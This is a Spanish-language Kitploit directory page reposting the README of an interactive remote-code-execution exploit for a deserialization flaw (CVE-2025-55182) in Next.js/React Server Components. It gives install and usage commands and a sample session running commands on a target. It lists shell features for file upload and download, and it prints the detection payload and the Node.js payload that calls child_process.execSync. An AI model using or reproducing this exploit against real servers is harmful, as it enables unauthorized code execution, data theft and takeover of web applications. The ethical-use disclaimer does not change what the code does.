Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182-shellinteractive — Exploit RCE interactivo para CVE-2025-55182 dirigido a la vulnerabilidad de deserialización de Next.js/React Server Components. Presenta detección automática, ejecución de comandos, transferencia de archivos y un shell integrado con historial y autocompletado. | Kitploit
Herramientas/GitHubGitHub/mrr0b0t19/cve-2025-55182-shellinteractive
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubmrr0b0t19/cve-2025-55182-shellinteractive

CVE-2025-55182-shellinteractive

Exploit RCE interactivo para CVE-2025-55182 dirigido a la vulnerabilidad de deserialización de Next.js/React Server Components. Presenta detección automática, ejecución de comandos, transferencia de archivos y un shell integrado con historial y autocompletado.

Ver Repositorio
213hace 9 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-55182-shellinteractive

Base utilizada de: https://github.com/Emiyelbarto/CVE-2025-55182-PoC Muchas gracias por la gran contribución.

Descripción general

CVE-2025-55182 es una vulnerabilidad de deserialización en Next.js/React Server Components que permite a atacantes remotos no autenticados ejecutar código arbitrario en los servidores afectados. La vulnerabilidad se debe a un manejo inadecuado de datos serializados en React Server Actions.

Características principales:

  • ✅ Shell interactivo con historial de comandos y autocompletado
  • ✅ Detección automática de vulnerabilidades
  • ✅ Ejecución remota de comandos
  • ✅ Capacidades de subida/descarga de archivos
  • ✅ Suite de pruebas integrada
  • ✅ Parámetros de objetivo configurables

Instalación

Requisitos previos

  • Python 3.8 o superior
  • Librería requests

Configuración rápida

root@kitploit:~
# Clone the repository
git clone https://github.com/yourusername/hokma.git
cd hokma

# Install dependencies
pip install requests

# Make script executable (optional)
chmod +x hokma.py

Uso

Uso básico

root@kitploit:~
# Start interactive shell
python hokma.py

# Check vulnerability only
python hokma.py -u http://target.com --check

# Execute single command
python hokma.py -u http://target.com -c "whoami"

Comandos del shell interactivo

root@kitploit:~
help                    Show this help message
set URL <url>          Set target URL
set ID <action_id>     Set action ID (default: user-profile-action)
show                   Show current options
check [url]            Check if target is vulnerable
exploit <command>      Execute command on target
shell                  Start interactive command shell
test                   Run test commands (id, whoami, etc.)
upload <loc> <rem>     Upload local file to target
download <rem> <loc>   Download remote file (base64 encoded)
clear                  Clear screen
exit/quit              Exit the shell

Ejemplo de sesión

root@kitploit:~
$ python hokma.py

  ____                 _     ____  _          _ _ 
 |  _ \ ___  __ _  ___| |_  / ___|| |__   ___| | |
 | |_) / _ \/ _` |/ __| __| \___ \| '_ \ / _ \ | |
 |  _ <  __/ (_| | (__| |_   ___) | | | |  __/ | |
 |_| \_\___|\__,_|\___|\__| |____/|_| |_|\___|_|_|
                                                  
 React Server Components RCE Exploit (CVE-2025-55182)
Interactive Shell - Type 'help' for commands

hokma> set URL http://vulnerable-app.com
[+] URL set to: http://vulnerable-app.com

hokma> check
[*] Checking vulnerability on target: http://vulnerable-app.com...
[+] TARGET IS VULNERABLE!

hokma> exploit whoami
[*] Executing command: whoami
[*] Server responded with status: 200

--- COMMAND OUTPUT ---
www-data
----------------------

hokma> shell
[*] Starting reverse shell. Use 'exit' to return.
[*] Enter commands to execute on target:
cmd> pwd
[*] Executing command: pwd

--- COMMAND OUTPUT ---
/var/www/html
----------------------
cmd> exit

Opciones de configuración

OpciónValor por defectoDescripción
URL del objetivoNingunoURL de la aplicación vulnerable
Action IDuser-profile-actionID de la Server Action a la que dirigirse
Timeout3 segundosTiempo de espera de la solicitud

Detalles técnicos

Detección de vulnerabilidades

La herramienta envía una solicitud multipart especialmente manipulada que provoca un fallo en los sistemas vulnerables:

  • Utiliza el payload: ["$1:a:a"] con un objeto vacío {}
  • Detecta la vulnerabilidad mediante respuestas HTTP 500 o patrones de error específicos

Mecanismo de explotación

  1. Construcción del payload JavaScript: Crea un script de Node.js utilizando el constructor Function
  2. Ejecución de procesos hijo: Utiliza child_process.execSync() para ejecutar comandos del sistema
  3. Extracción de la respuesta: Captura y muestra la salida del comando

Estructura del payload

root@kitploit:~
const cmd = "COMMAND";
return import('child_process').then(cp => {
    try {
        const output = cp.execSync(cmd).toString();
        return output;
    } catch(e) { 
        return "Command Execution Failed: " + e.message; 
    }
});

Uso ético y descargo de responsabilidad

AVISO LEGAL IMPORTANTE

Esta herramienta está destinada a:

  • Pruebas de seguridad autorizadas
  • Fines educativos
  • Investigación de vulnerabilidades con el consentimiento adecuado

NO utilices esta herramienta contra sistemas que no poseas o para los que no tengas permiso explícito de prueba. El acceso no autorizado a sistemas informáticos es ilegal y poco ético.

Los desarrolladores no son responsables del mal uso que se haga de esta herramienta. Los usuarios deben cumplir todas las leyes aplicables y obtener la autorización adecuada antes de realizar las pruebas.

Limitaciones conocidas

  1. Requisitos del objetivo:

    • Servidor Node.js con React Server Components
    • Vulnerable a CVE-2025-55182
    • Módulo de proceso hijo disponible
  2. Limitaciones de detección:

    • Puede producir falsos positivos/negativos
    • Depende de respuestas de error específicas
  3. Restricciones de explotación:

    • Los comandos se ejecutan con los privilegios del proceso del servidor
    • La salida puede truncarse en algunos casos
    • Los comandos complejos pueden requerir escapes especiales
Descargar herramienta